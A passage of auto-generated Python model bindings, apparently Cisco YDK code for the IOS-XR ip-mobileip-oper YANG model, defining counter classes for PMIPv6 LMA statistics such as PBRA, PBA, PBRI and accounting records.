self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbriReceiveStatistics, ['pbri_count', 'pbri_drop_count', 'unspecified_count', 'admin_reason_count', 'mag_handover_same_att_count', 'mag_handover_different_att_count', 'mag_handover_unknown_count', 'user_session_termination_count', 'network_session_termination_count', 'out_of_sync_bce_state_count', 'per_peer_policy_count', 'revoking_mn_local_policy_count'], name, value)
class PbraSendStatistics(Entity):
"""
PBRA Send Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics, self).__init__()
self.yang_name = "pbra-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-send-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraSendStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class PbraReceiveStatistics(Entity):
"""
PBRA Receive Statistics
.. attribute:: pbra_count
Count of PBRAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbra_drop_count
Count of PBRAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: success_count
Count of Revoc Status \- Success
**type**\: int
**range:** 0..4294967295
.. attribute:: partial_success_count
Count of Revoc Status \- Partial Success
**type**\: int
**range:** 0..4294967295
.. attribute:: no_binding_count
Count of Revoc Status \- Binding Does Not Exist
**type**\: int
**range:** 0..4294967295
.. attribute:: hoa_required_count
Count of Revoc Status \- IPv4 Home Address Option Required
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_global_revoc_count
Count of Revoc Status \- Global Revocation NOT Authorized
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_identity_required_count
Count of Revoc Status \- Revoked Mobile Node Identity Required
**type**\: int
**range:** 0..4294967295
.. attribute:: mn_attached_count
Count of Revoc Status \- Revocation Failed \- MN is Attached
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_revoc_trigger_count
Count of Revoc Status \- Revocation Trigger NOT supported
**type**\: int
**range:** 0..4294967295
.. attribute:: revoc_function_not_supported_count
Count of Revoc Status \- Revocation Function NOT Supported
**type**\: int
**range:** 0..4294967295
.. attribute:: pbr_not_supported_count
Count of Revoc Status \- Proxy Binding Revocation NOT Supported
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics, self).__init__()
self.yang_name = "pbra-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbra_count', (YLeaf(YType.uint64, 'pbra-count'), ['int'])),
('pbra_drop_count', (YLeaf(YType.uint32, 'pbra-drop-count'), ['int'])),
('success_count', (YLeaf(YType.uint32, 'success-count'), ['int'])),
('partial_success_count', (YLeaf(YType.uint32, 'partial-success-count'), ['int'])),
('no_binding_count', (YLeaf(YType.uint32, 'no-binding-count'), ['int'])),
('hoa_required_count', (YLeaf(YType.uint32, 'hoa-required-count'), ['int'])),
('no_author_for_global_revoc_count', (YLeaf(YType.uint32, 'no-author-for-global-revoc-count'), ['int'])),
('mn_identity_required_count', (YLeaf(YType.uint32, 'mn-identity-required-count'), ['int'])),
('mn_attached_count', (YLeaf(YType.uint32, 'mn-attached-count'), ['int'])),
('unknown_revoc_trigger_count', (YLeaf(YType.uint32, 'unknown-revoc-trigger-count'), ['int'])),
('revoc_function_not_supported_count', (YLeaf(YType.uint32, 'revoc-function-not-supported-count'), ['int'])),
('pbr_not_supported_count', (YLeaf(YType.uint32, 'pbr-not-supported-count'), ['int'])),
])
self.pbra_count = None
self.pbra_drop_count = None
self.success_count = None
self.partial_success_count = None
self.no_binding_count = None
self.hoa_required_count = None
self.no_author_for_global_revoc_count = None
self.mn_identity_required_count = None
self.mn_attached_count = None
self.unknown_revoc_trigger_count = None
self.revoc_function_not_supported_count = None
self.pbr_not_supported_count = None
self._segment_path = lambda: "pbra-receive-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/protocol-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.ProtocolStatistics.PbraReceiveStatistics, ['pbra_count', 'pbra_drop_count', 'success_count', 'partial_success_count', 'no_binding_count', 'hoa_required_count', 'no_author_for_global_revoc_count', 'mn_identity_required_count', 'mn_attached_count', 'unknown_revoc_trigger_count', 'revoc_function_not_supported_count', 'pbr_not_supported_count'], name, value)
class AccountingStatistics(Entity):
"""
LMA Accounting Statistics
.. attribute:: accounting_start_sent_count
Count of Accounting Start Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_update_sent_count
Count of Accounting Update Records Sent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: accounting_stop_sent_count
Count of Accounting Stop Records Sent
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.Global.AccountingStatistics, self).__init__()
self.yang_name = "accounting-statistics"
self.yang_parent_name = "global"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('accounting_start_sent_count', (YLeaf(YType.uint64, 'accounting-start-sent-count'), ['int'])),
('accounting_update_sent_count', (YLeaf(YType.uint64, 'accounting-update-sent-count'), ['int'])),
('accounting_stop_sent_count', (YLeaf(YType.uint64, 'accounting-stop-sent-count'), ['int'])),
])
self.accounting_start_sent_count = None
self.accounting_update_sent_count = None
self.accounting_stop_sent_count = None
self._segment_path = lambda: "accounting-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/global/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.Global.AccountingStatistics, ['accounting_start_sent_count', 'accounting_update_sent_count', 'accounting_stop_sent_count'], name, value)
class MagStatistics(Entity):
"""
Table of MAGStatistics
.. attribute:: mag_statistic
Peer MAG statistics
**type**\: list of :py:class:`MagStatistic <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics, self).__init__()
self.yang_name = "mag-statistics"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("mag-statistic", ("mag_statistic", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic))])
self._leafs = OrderedDict()
self.mag_statistic = YList(self)
self._segment_path = lambda: "mag-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics, [], name, value)
class MagStatistic(Entity):
"""
Peer MAG statistics
.. attribute:: mag_name (key)
Peer MAG Name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic, self).__init__()
self.yang_name = "mag-statistic"
self.yang_parent_name = "mag-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['mag_name']
self._child_classes = OrderedDict([("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics))])
self._leafs = OrderedDict([
('mag_name', (YLeaf(YType.str, 'mag-name'), ['str'])),
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
])
self.mag_name = None
self.lma_identifier = None
self.protocol_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self._segment_path = lambda: "mag-statistic" + "[mag-name='" + str(self.mag_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/mag-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic, ['mag_name', 'lma_identifier'], name, value)
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "mag-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not auth.for proxyreg
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Recevied HNPs do not match with BCE
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
('timestamp_lower_than_previous_accepted_count', (YLeaf(YType.uint32, 'timestamp-lower-than-previous-accepted-count'), ['int'])),
('missing_hnp_opt_count', (YLeaf(YType.uint32, 'missing-hnp-opt-count'), ['int'])),
('received_hnps_do_not_match_bce_hnps_count', (YLeaf(YType.uint32, 'received-hnps-do-not-match-bce-hnps-count'), ['int'])),
('missing_mn_id_opt_count', (YLeaf(YType.uint32, 'missing-mn-id-opt-count'), ['int'])),
('missing_hi_opt_count', (YLeaf(YType.uint32, 'missing-hi-opt-count'), ['int'])),
('missing_access_tech_type_opt_count', (YLeaf(YType.uint32, 'missing-access-tech-type-opt-count'), ['int'])),
('no_author_for_ipv4_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-mobility-count'), ['int'])),
('no_author_for_ipv4_hoa_count', (YLeaf(YType.uint32, 'no-author-for-ipv4-hoa-count'), ['int'])),
('no_author_for_ipv6_mobility_count', (YLeaf(YType.uint32, 'no-author-for-ipv6-mobility-count'), ['int'])),
('multiple_ipv4_ho_a_not_supported_count', (YLeaf(YType.uint32, 'multiple-ipv4-ho-a-not-supported-count'), ['int'])),
('gre_key_opt_required_count', (YLeaf(YType.uint32, 'gre-key-opt-required-count'), ['int'])),
])
self.pba_count = None
self.pba_drop_count = None
self.accepted_count = None
self.unknown_count = None
self.unspecified_failure_count = None
self.admin_failure_count = None
self.resource_failure_count = None
self.home_reg_failure_count = None
self.home_subnet_failure_count = None
self.bad_sequence_failure_count = None
self.reg_type_failure_count = None
self.authen_failure_count = None
self.proxy_reg_not_enabled_count = None
self.not_lma_for_this_mn_count = None
self.no_author_for_proxy_reg_count = None
self.no_author_for_hnp_count = None
self.timestamp_mismatch_count = None
self.timestamp_lower_than_previous_accepted_count = None
self.missing_hnp_opt_count = None
self.received_hnps_do_not_match_bce_hnps_count = None
self.missing_mn_id_opt_count = None
self.missing_hi_opt_count = None
self.missing_access_tech_type_opt_count = None
self.no_author_for_ipv4_mobility_count = None
self.no_author_for_ipv4_hoa_count = None
self.no_author_for_ipv6_mobility_count = None
self.multiple_ipv4_ho_a_not_supported_count = None
self.gre_key_opt_required_count = None
self._segment_path = lambda: "pba-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbaSendStatistics, ['pba_count', 'pba_drop_count', 'accepted_count', 'unknown_count', 'unspecified_failure_count', 'admin_failure_count', 'resource_failure_count', 'home_reg_failure_count', 'home_subnet_failure_count', 'bad_sequence_failure_count', 'reg_type_failure_count', 'authen_failure_count', 'proxy_reg_not_enabled_count', 'not_lma_for_this_mn_count', 'no_author_for_proxy_reg_count', 'no_author_for_hnp_count', 'timestamp_mismatch_count', 'timestamp_lower_than_previous_accepted_count', 'missing_hnp_opt_count', 'received_hnps_do_not_match_bce_hnps_count', 'missing_mn_id_opt_count', 'missing_hi_opt_count', 'missing_access_tech_type_opt_count', 'no_author_for_ipv4_mobility_count', 'no_author_for_ipv4_hoa_count', 'no_author_for_ipv6_mobility_count', 'multiple_ipv4_ho_a_not_supported_count', 'gre_key_opt_required_count'], name, value)
class PbriSendStatistics(Entity):
"""
PBRI Send Statistics
.. attribute:: pbri_count
Count of PBRIs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbri_drop_count
Count of PBRIs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_count
Count of Revoc Trigger \- Unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_reason_count
Count of Revoc Trigger \- Administrative Reason
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_same_att_count
Count of Revoc Trigger \- Inter MAG Handover Same ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_different_att_count
Count of Revoc Trigger \- Inter MAG Handover Different ATT
**type**\: int
**range:** 0..4294967295
.. attribute:: mag_handover_unknown_count
Count of Revoc Trigger \- Inter MAG Handover Unknown
**type**\: int
**range:** 0..4294967295
.. attribute:: user_session_termination_count
Count of Revoc Trigger \- User Init Session Terminatation
**type**\: int
**range:** 0..4294967295
.. attribute:: network_session_termination_count
Count of Revoc Trigger \- Access Network Session Termination
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sync_bce_state_count
Count of Revoc Trigger \- Possible Out\-of\-Sync BCE State
**type**\: int
**range:** 0..4294967295
.. attribute:: per_peer_policy_count
Count of Revoc Trigger \- Per\-Peer Policy
**type**\: int
**range:** 0..4294967295
.. attribute:: revoking_mn_local_policy_count
Count of Revoc Trigger \- Revoking Mobility Node Local Policy
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.MagStatistics.MagStatistic.ProtocolStatistics.PbriSendStatistics, self).__init__()
self.yang_name = "pbri-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbri_count', (YLeaf(YType.uint64, 'pbri-count'), ['int'])),
('pbri_drop_count', (YLeaf(YType.uint32, 'pbri-drop-count'), ['int'])),
('unspecified_count', (YLeaf(YType.uint32, 'unspecified-count'), ['int'])),
('admin_reason_count', (YLeaf(YType.uint32, 'admin-reason-count'), ['int'])),
('mag_handover_same_att_count', (YLeaf(YType.uint32, 'mag-handover-same-att-count'), ['int'])),
('mag_handover_different_att_count', (YLeaf(YType.uint32, 'mag-handover-different-att-count'), ['int'])),
('mag_handover_unknown_count', (YLeaf(YType.uint32, 'mag-handover-unknown-count'), ['int'])),
('user_session_termination_count', (YLeaf(YType.uint32, 'user-session-termination-count'), ['int'])),
('network_session_termination_count', (YLeaf(YType.uint32, 'network-session-termination-count'), ['int'])),
('out_of_sync_bce_state_count', (YLeaf(YType.uint32, 'out-of-sync-bce-state-count'), ['int'])),
('per_peer_policy_count', (YLeaf(YType.uint32, 'per-peer-policy-count'), ['int'])),
('revoking_mn_local_policy_count', (YLeaf(YType.uint32, 'revoking-mn-local-policy-count'), ['int'])),
])
self.pbri_count = None
self.pbri_drop_count = None
self.unspecified_count = None
self.admin_reason_count = None
self.mag_handover_same_att_count = None
self.mag_handover_different_att_count = None
self.mag_handover_unknown_count = None
self.user_session_termination_count = None
self.network_session_termination_count = None
self.out_of_sync_bce_state_count = None
self.per_peer_policy_count = None
self.revoking_mn_local_policy_count = None
self._segment_path = lambda: "pbri-send-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
